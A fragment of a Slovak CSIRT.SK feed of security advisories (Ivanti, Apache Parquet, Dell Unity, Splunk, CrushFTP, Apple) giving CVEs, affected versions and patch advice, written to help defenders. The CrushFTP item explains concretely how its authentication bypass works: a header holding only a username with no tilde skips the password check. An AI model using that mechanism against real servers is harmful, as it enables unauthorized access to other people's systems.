<p>Podľa <a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457">výrobcu</a> a&nbsp;spoločnosti&nbsp;<a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability">Mandiant</a> je zraniteľnosť <strong>aktívne zneužívaná v&nbsp;rámci útokov na Ivanti Connect Secure </strong>a<strong> Pulse Connect Secure</strong>.</p>



<p>Pozn.: Zraniteľnosť bola v&nbsp;produkte Ivanti Connect Secure odstránená už v&nbsp;aktualizáciách z&nbsp;februára 2025.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Ivanti odporúča používať produkty s&nbsp;platnou podporou. Výrobca odporúča bezodkladnú aktualizáciu Ivanti Connect Secure na verziu 22.7R2.6 alebo novšiu, Ivanti Policy Secure na verziu 22.7R1.4 (vydanie aktualizácie naplánované na 21. apríla 2025) a&nbsp;ZTA Gateways na verziu 22.8R2.2 (vydanie aktualizácie naplánované na 19. apríla 2025). V&nbsp;prípade produktu Pulse Connect Secure odporúča migráciu na produkt Ivanti Connect Secure s&nbsp;platnou podporou.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.ivanti.com/blog/security-update-pulse-connect-secure-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways">https://www.ivanti.com/blog/security-update-pulse-connect-secure-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways</a></li>



<li><a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457">https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-22457">https://nvd.nist.gov/vuln/detail/CVE-2025-22457</a></li>



<li><a href="https://www.cisa.gov/news-events/alerts/2025/04/04/ivanti-releases-security-updates-connect-secure-policy-secure-zta-gateways-vulnerability-cve-2025">https://www.cisa.gov/news-events/alerts/2025/04/04/ivanti-releases-security-updates-connect-secure-policy-secure-zta-gateways-vulnerability-cve-2025</a></li>



<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability">https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2292/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v Apache Parquet</title>
		<link>/posts/2289</link>
					<comments>/posts/2289#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 10 Apr 2025 11:33:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache Parquet]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2289</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/Apache_Parquet-1024x632.png" alt="" /></p>Vývojári stĺpcovo orientovaného formátu súborov Apache Parquet vydali bezpečnostné aktualizácie pre svoju knižnicu pre Java, ktoré opravujú kritickú zraniteľnosť. CVE-2025-30065...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/Apache_Parquet-1024x632.png" alt="" /></p>
<p><strong>Vývojári stĺpcovo orientovaného formátu súborov Apache Parquet vydali bezpečnostné aktualizácie pre svoju knižnicu pre Java, ktoré opravujú kritickú zraniteľnosť. CVE-2025-30065 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémami využívajúcimi predmetnú knižnicu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>knižnica Java Apache Parquet vo verziách 1.15.0 a starších</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-30065 </strong>(CVSS skóre 10,0)</p>



<p>Zraniteľnosť v&nbsp;komponente parquet-avro spočíva v&nbsp;nesprávnom parsovaní schém umožňujúcom deserializáciu nedôveryhodných dát. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov Parquet mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť vo všetkých&nbsp; analytických systémoch, ktoré importujú súbory Parquet z&nbsp;externých zdrojov</strong> – t.j. veľké big-data frameworky ako napr. Hadoop, Spark alebo Flink, ale aj&nbsp;vlastné aplikácie využívajúce knižnicu Java Parquet.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame uistiť sa, či Vaše produkty a&nbsp;služby nevyužívajú zraniteľné verzie knižnice Java Apache Parquet. Ak áno, odporúčame bezodkladnú aktualizáciu knižnice na verziu 1.15.1 alebo novšiu.</p>



<p>Mitigovať zraniteľnosť môžete dôkladnou validáciou súborov Parquet, pred ich importovaním a spracovaním.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.openwall.com/lists/oss-security/2025/04/01/1">https://www.openwall.com/lists/oss-security/2025/04/01/1</a></li>



<li><a href="https://www.endorlabs.com/learn/critical-rce-vulnerability-in-apache-parquet-cve-2025-30065---advisory-and-analysis">https://www.endorlabs.com/learn/critical-rce-vulnerability-in-apache-parquet-cve-2025-30065&#8212;advisory-and-analysis</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-30065">https://nvd.nist.gov/vuln/detail/CVE-2025-30065</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/max-severity-rce-flaw-discovered-in-widely-used-apache-parquet/">https://www.bleepingcomputer.com/news/security/max-severity-rce-flaw-discovered-in-widely-used-apache-parquet/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2289/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – marec 2025</title>
		<link>/posts/2284</link>
					<comments>/posts/2284#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 09 Apr 2025 09:21:00 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2284</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci marec 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci marec 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/04/MS202503.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 03/2025 PDF (1 492 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2284/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v úložiskách Dell Unity, Dell UnityVSA a Dell Unity XT</title>
		<link>/posts/2253</link>
					<comments>/posts/2253#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Apr 2025 13:24:57 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Dell]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2253</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/Dell-Logo-1024x640.png" alt="" /></p>Spoločnosť Dell vydala bezpečnostné aktualizácie na svoje úložiská Dell Unity, Dell UnityVSA a&#160;Dell Unity XT, ktoré opravujú 15 zraniteľností, z&#160;čoho...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/Dell-Logo-1024x640.png" alt="" /></p>
<p><strong>Spoločnosť Dell vydala bezpečnostné aktualizácie na svoje úložiská Dell Unity, Dell UnityVSA a&nbsp;Dell Unity XT, ktoré opravujú 15 zraniteľností, z&nbsp;čoho 2 sú označené ako kritické. Kritickú zraniteľnosť s&nbsp;označením CVE-2025-22398 možno zneužiť na vzdialené vykonanie kódu a&nbsp;zraniteľnosť CVE-2025-24383 na vykonanie neoprávnených zmien v&nbsp;systéme, ktoré môžu spôsobiť úplnú nedostupnosť služieb.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Dell Unity s Dell Unity Operating Environment (OE) vo verziách starších ako 5.5.0.0.5.259</li>



<li>Dell UnityVSA s Dell Unity Operating Environment (OE) vo verziách starších ako 5.5.0.0.5.259</li>



<li>Dell Unity XT s Dell Unity Operating Environment (OE) vo verziách starších ako 5.5.0.0.5.259</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong><span style="text-decoration: underline;">Kritické zraniteľnosti</span></strong></p>



<p><strong>CVE-2025-22398 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnej neutralizácii špeciálnych elementov používaných v&nbsp;príkazoch operačného systému. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie systémových príkazov</strong> s&nbsp;oprávneniami používateľa root a následné&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>CVE-2025-24383 </strong>(CVSS skóre 9,1)</p>



<p>Zraniteľnosť spočíva v nesprávnej neutralizácii špeciálnych elementov používaných v príkazoch operačného systému. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>zmazanie ľubovoľných súborov na súborovom systéme zariadenia</strong>. Zmazanie súboru môže v&nbsp;závislosti od jeho využitia v&nbsp;systéme viesť k&nbsp;<strong>zmene konfigurácie</strong> alebo <strong>úplnej nedostupnosti systému</strong>.</p>



<p><strong><span style="text-decoration: underline;">Vysoko závažné zraniteľnosti</span></strong></p>



<p>Identifikátor <strong>CVE-2025-24381</strong> (CVSS skóre 8,8) je pridelený tzv. <strong>open redirect zraniteľnosti</strong>, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>presmerovanie používateľov na ľubovoľný URL odkaz</strong>. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí navštíviť špeciálne vytvorený URL odkaz.</p>



<p>Ostatné zraniteľnosti vysokej závažnosti (<strong>CVE-2024-49563, CVE-2024-49564, CVE-2024-49565, CVE-2024-49566, CVE-2025-23383, CVE-2025-24377, CVE-2025-24378, CVE-2025-24379, CVE-2025-24380, CVE-2025-24385, CVE-2025-24386, CVE-2024-49601, CVE-2025-24382</strong>) spočívajú v&nbsp;nesprávnej neutralizácii špeciálnych elementov používaných v&nbsp;príkazoch operačného systému a lokálny útočník by ich mohol zneužiť na <strong>eskaláciu privilégií</strong> a&nbsp;<strong>vzdialené vykonanie príkazov a kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Presmerovanie používateľov na škodlivé URL</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Dell Unity Operating Environment (OE) na Dell Unity, Dell UnityVSA a&nbsp;Dell Unity XT na verziu 5.5.0.0.5.259 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.dell.com/support/kbdoc/en-us/000300090/dsa-2025-116-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities">https://www.dell.com/support/kbdoc/en-us/000300090/dsa-2025-116-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities</a></li>



<li><a href="https://securityonline.info/cve-2025-22398-dell-unity-hit-by-9-8-cvss-root-level-command-injection-flaw/">https://securityonline.info/cve-2025-22398-dell-unity-hit-by-9-8-cvss-root-level-command-injection-flaw/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2253/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Návod pre overenie úniku prihlasovacích údajov z Vašej domény</title>
		<link>/posts/2248</link>
					<comments>/posts/2248#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Apr 2025 12:32:18 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[HIBP]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[návod]]></category>
		<guid isPermaLink="false">/?p=2248</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Zažili ste vo Vašej organizácii únik prihlasovacích údajov do e-mailového alebo iného konta Vášho zamestnanca? Bohužiaľ čo sa týka podobných...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Zažili ste vo Vašej organizácii únik prihlasovacích údajov do e-mailového alebo iného konta Vášho zamestnanca? Bohužiaľ čo sa týka podobných incidentov, otázka z praxe neznie &#8220;či&#8221;, ale &#8220;kedy&#8221;. Ako môžete zabrániť kompromitácii Vašej infraštruktúry, keď už má útočník valídne prihlasovacie údaje? Ak máte potrebnú vedomosť, môžete konať skôr, ako on.</p>



<p>V rámci proaktívnych činností VJ CSIRT sme vydali pre Vás stručný návod &#8220;<a href="https://csirt.sk/wp-content/uploads/2025/04/Navod-HIBP.pdf" data-type="link" data-id="/wp-content/uploads/2025/04/Navod-HIBP.pdf">Overenie úniku prihlasovacích údajov pre konkrétnu doménu (v rámci známych databáz únikov v službe HaveIBeenPwned)</a>&#8220;. </p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2248/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti v produktoch Splunk</title>
		<link>/posts/2241</link>
					<comments>/posts/2241#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Apr 2025 12:07:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Splunk]]></category>
		<guid isPermaLink="false">/?p=2241</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/Splunk_logo.png" alt="" /></p>Spoločnosť Splunk vydala bezpečnostné aktualizácie na svoje produkty Splunk Enterprise, Splunk Cloud Platform a Splunk Secure Gateway, ktoré opravujú 8...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/Splunk_logo.png" alt="" /></p>
<p><strong>Spoločnosť Splunk vydala bezpečnostné aktualizácie na svoje produkty Splunk Enterprise, Splunk Cloud Platform a Splunk Secure Gateway, ktoré opravujú 8 bezpečnostných zraniteľností, z&nbsp;čoho 2 sú označené ako vysoko závažné. CVE-2025-20229 možno zneužiť na vzdialené vykonanie kódu a CVE-2025-20231 na získanie neoprávneného prístupu k&nbsp;citlivým údajom. Aktualizácie taktiež opravujú viacero zraniteľností v&nbsp;komponentoch tretích strán, ktoré sú v&nbsp;rámci produktov využívané.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Splunk Enterprise 9.4.X vo verziách starších ako 9.4.1</li>



<li>Splunk Enterprise 9.3.X vo verziách starších ako 9.3.3</li>



<li>Splunk Enterprise 9.2.X vo verziách starších ako 9.2.5</li>



<li>Splunk Enterprise 9.1.X vo verziách starších ako 9.1.8</li>



<li>Splunk Cloud Platform&nbsp; 9.3.2408.X vo verziách starších ako 9.3.2408.104</li>



<li>Splunk Cloud Platform&nbsp; 9.2.2406.X vo verziách starších ako 9.2.2406.108</li>



<li>Splunk Cloud Platform&nbsp; 9.2.2403.X vo verziách starších ako 9.2.2403.114</li>



<li>Splunk Cloud Platform&nbsp; 9.1.2312.X vo verziách starších ako 9.1.2312.208</li>



<li>Splunk Cloud Platform&nbsp; 9.1.2308.X vo verziách starších ako 9.1.2308.214</li>



<li>Splunk Secure Gateway 3.8.X vo verziách starších ako 3.8.38</li>



<li>Splunk Secure Gateway 3.7.X vo verziách starších ako 3.7.23</li>



<li>Splunk App for Data Science and Deep Learning&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; vo verziách starších ako 5.2.0</li>



<li>Splunk Add-on for Microsoft Cloud Services 5.4.X vo verziách starších ako 5.4.3</li>



<li>Splunk Infrastructure Monitoring Add-on vo verziách starších ako 1.2.7</li>



<li>Dockerové image splunk/splunk 9.4.X vo verziách starších ako 9.4.1</li>



<li>Dockerové image splunk/splunk 9.3.X vo verziách starších ako 9.3.3</li>



<li>Dockerové image splunk/splunk 9.2.X vo verziách starších ako 9.2.5</li>



<li>Dockerové image splunk/splunk 9.1.X vo verziách starších ako 9.1.8</li>



<li>Dockerové image splunk/universalforwarder 9.4.X vo verziách starších ako 9.4.1</li>



<li>Dockerové image splunk/universalforwarder 9.3.X vo verziách starších ako 9.3.3</li>



<li>Dockerové image splunk/universalforwarder 9.2.X vo verziách starších ako 9.2.5</li>



<li>Dockerové image splunk/universalforwarder 9.1.X vo verziách starších ako 9.1.8</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong><span style="text-decoration: underline;">Vysoko závažné zraniteľnosti</span></strong></p>



<p><strong>CVE-2025-20229 </strong>(CVSS skóre 8,0)</p>



<p>Zraniteľnosť v&nbsp;produktoch <strong>Splunk Enterprise</strong> a&nbsp;<strong>Splunk Cloud Platform</strong> spočíva v&nbsp;chýbajúcom overovaní autorizácie a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na nahratie špeciálne vytvoreného súboru do priečinka „$SPLUNK_HOME/var/run/splunk/apptemp“ a&nbsp;<strong>následné vykonanie škodlivého kódu</strong>.</p>



<p><strong>CVE-2025-20231 </strong>(CVSS skóre 7,1)</p>



<p>CVE-2025-20231 v&nbsp;produktoch <strong>Splunk Enterprise</strong> a&nbsp;<strong>Spunk Secure Gateway</strong> by vzdialený autentifikovaný útočník mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>. Splunk Secure Gateway pri volaniach na REST API „/services/ssg/secrets“ do logového súboru splunk_secure_gateway.log ukladá údaje o&nbsp;relácii používateľa a&nbsp;autentifikačné tokeny vo forme otvoreného textu. Samotná zraniteľnosť spočíva v nesprávnom nastavení oprávnení. Používateľom s&nbsp;nízkymi oprávneniami umožňuje spustiť vyhľadávanie s&nbsp;oprávneniami vyššie privilegovaných používateľov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí prostredníctvom webového prehliadača iniciovať požiadavku na predmetné API.</p>



<p><strong><span style="text-decoration: underline;">Zraniteľnosti strednej závažnosti</span></strong></p>



<p>Ostatné zraniteľnosti strednej závažnosti&nbsp; v <strong>Splunk Enterprise, Splunk Cloud Platform&nbsp; </strong>a<strong> Spunk Secure Gateway</strong> možno zneužiť na realizáciu CSRF (Cross Site Request Forgery) útokov (CVE-2025-20228), obídenie bezpečnostných prvkov SPL a&nbsp;vykonanie príkazov (CVE-2025-20232, CVE-2025-20226), získanie neoprávneného prístupu k&nbsp;citlivý údajom (CVE-2025-20227) a&nbsp;vykonanie neoprávnených zmien v&nbsp;systéme (CVE-2025-20230).</p>



<p><strong><span style="text-decoration: underline;">Zraniteľnosti v komponentoch tretích strán</span></strong></p>



<p>Bezpečnostné aktualizácie zároveň opravujú viacero zraniteľností v&nbsp;externých komponentoch (idna, certifi, requests, urllib3, cryptography, axios a Jinja2), ktoré sú využívané v&nbsp;rámci produktov Splunk.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Vykonanie neoprávnených zmien v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Aktualizácia zraniteľných systémov na verzie špecifikované v&nbsp;časti Zraniteľné systémy.</p>



<p>Zraniteľnosť CVE-2025-20231 &nbsp;je možné mitigovať deaktiváciou Splunk Secure Gateway App podľa <a href="https://docs.splunk.com/Documentation/Splunk/latest/Admin/Managingappobjects">postupu</a> na stránke výrobcu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://advisory.splunk.com/advisories">https://advisory.splunk.com/advisories</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0301">https://advisory.splunk.com/advisories/SVD-2025-0301</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0302">https://advisory.splunk.com/advisories/SVD-2025-0302</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0303">https://advisory.splunk.com/advisories/SVD-2025-0303</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0304">https://advisory.splunk.com/advisories/SVD-2025-0304</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0305">https://advisory.splunk.com/advisories/SVD-2025-0305</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0306">https://advisory.splunk.com/advisories/SVD-2025-0306</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0307">https://advisory.splunk.com/advisories/SVD-2025-0307</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0310">https://advisory.splunk.com/advisories/SVD-2025-0310</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0308">https://advisory.splunk.com/advisories/SVD-2025-0308</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0309">https://advisory.splunk.com/advisories/SVD-2025-0309</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0311">https://advisory.splunk.com/advisories/SVD-2025-0311</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0312">https://advisory.splunk.com/advisories/SVD-2025-0312</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0401">https://advisory.splunk.com/advisories/SVD-2025-0401</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2025-0402">https://advisory.splunk.com/advisories/SVD-2025-0402</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2241/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť CrushFTP umožňuje obísť prihlasovanie</title>
		<link>/posts/2239</link>
					<comments>/posts/2239#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Apr 2025 12:00:10 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<guid isPermaLink="false">/?p=2239</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/04/crush-ftp-e1637581663662.jpg" alt="" /></p>CrushFTP obsahuje aktívne zneužívanú kritickú zraniteľnosť vo svojom autentifikačnom mechanizme, ktorá dovoľuje prihlásiť sa len s&#160;uvedením prihlasovacieho mena. Zraniteľné systémy:...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/04/crush-ftp-e1637581663662.jpg" alt="" /></p>
<p><strong>CrushFTP obsahuje aktívne zneužívanú kritickú zraniteľnosť vo svojom autentifikačnom mechanizme, ktorá dovoľuje prihlásiť sa len s&nbsp;uvedením prihlasovacieho mena.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>CrushFTP 10.0.0 – 10.8.3</li>



<li>CrushFTP 11.0.0 – 11.3.0</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-2825 </strong>(CVSS skóre 9,8)</p>



<p>Vývojári CrushFTP opravili kritickú zraniteľnosť CVE-2025-2825, ktorá umožňuje obídenie autentifikácie a získanie neoprávneného prístupu k zraniteľným systémom. Zraniteľnosť sa nachádza vo funkcii autentifikačného mechanizmu <em>loginCheckHeaderAuth()</em> v súbore <em>ServerSessionHTTP.java</em>. Útočník môže poslať autentifikačnú požiadavky s hlavičkou S3, ktorá obsahuje iba používateľské meno (<em>Credential=username/</em>). Pokiaľ toto neobsahuje tildu (~), parameter pre preskočenie kontroly hesla je nastavený na hodnotu „true“ a útočník získa prístup do systému.</p>



<p>Útočníci zraniteľnosť aktívne zneužívajú. Bezpečnostná platforma Shadowserver zaznamenala desiatky pokusov o zneužitie tejto zraniteľnosti na verejne dostupných CrushFTP serveroch. </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie autentifikácie</strong></li>



<li><strong>Získanie kontroly nad zraniteľným systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia CrushFTP aspoň na verziu 10.8.4 alebo 11.3.1.</p>



<p>Pokiaľ aktualizácia nie je možná, môžete ju mitigovať povolením možnosti DMZ.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://projectdiscovery.io/blog/crushftp-authentication-bypass">https://projectdiscovery.io/blog/crushftp-authentication-bypass</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-auth-bypass-bug-in-crushftp-now-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/critical-auth-bypass-bug-in-crushftp-now-exploited-in-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2239/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Apple vydala opravy 213 zraniteľností v iOS, iPadOS a macOS, aktualizovala aj staršie systémy</title>
		<link>/posts/2237</link>
					<comments>/posts/2237#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Apr 2025 11:56:46 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2237</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple vydala aktualizačné balíky pre svoje systémy iOS, iPadOS a&#160;macOS, v&#160;ktorých opravuje množstvo bezpečnostných chýb. Zároveň aktualizovala aj staršie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple vydala aktualizačné balíky pre svoje systémy iOS, iPadOS a&nbsp;macOS, v&nbsp;ktorých opravuje množstvo bezpečnostných chýb. Zároveň aktualizovala aj staršie systémy iOS a&nbsp;iPadOS verzií 15,&nbsp;16 a 17 a&nbsp;macOS 13 a 14, s&nbsp;cieľom odstrániť aktívne zneužívané zraniteľnosti zverejnené v&nbsp;posledných mesiacoch. Opravy vydala aj pre tvOS a&nbsp;visionOS.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>iOS, verzie staršie ako 15.8.4, 16.7.11, 18.4</li>



<li>iPadOS versie staršie ako 15.8.4, 16.7.11, 17.7.6, 18.4</li>



<li>macOS verzie staršie ako 13.7.5, 14.7.5, 15.4</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong><u>Opravy novo objavených zraniteľností</u></strong></p>



<p>Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú:</p>



<p>77 zraniteľností v <strong>iOS</strong> a <strong>iPadOS</strong>, vrátane</p>



<ul>
<li>CVE-2025-30456 – umožňuje obísť aplikačný sandbox a zvýšiť privilégiá na úroveň používateľa root</li>



